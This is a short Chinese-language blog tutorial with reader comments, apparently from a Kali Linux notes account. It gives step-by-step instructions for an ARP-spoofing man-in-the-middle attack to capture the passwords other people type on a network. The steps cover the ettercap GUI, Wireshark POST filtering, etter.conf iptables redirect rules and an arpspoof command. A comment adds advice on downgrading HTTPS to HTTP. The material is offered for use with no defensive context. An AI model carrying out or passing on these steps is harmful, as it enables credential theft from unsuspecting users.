图形界面攻击
命令:
ettercap -G
启动中间人攻击,这里需要注意大小写。
依次点击sniff
-unified sniffing
选择我们的无线网卡
点击host
-scan for hosts
-host list
扫描设备
点击目标主机添加为target1
将路由设置为target2
然后点击mitm
-arp psisoning
将第一个勾选
然后点击start
当设备有密码登录时,我们就可以拦截到对方输入的密码。
当然,我们也可以用wireshark
分析post
来获取密码
当我们抓到握手包后,在协议中搜索http.request.method == "POST"
其他一些相应的信息
命令界面
一:先编辑配置文件
vim/etc/ettercap/etter.conf
去掉前面的#号
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
二:开启ARP欺骗
arpspoof -t 目标 网关 -i 设备
截取的密码
当然这期教程之前在公众号发布过视频教程
6 comments
大佬 你公众号叫什么
Kali笔记
谢谢
你好!博主!我问下https的该怎样弄!
先将https转为http
有什么问题,可直接在下方留言。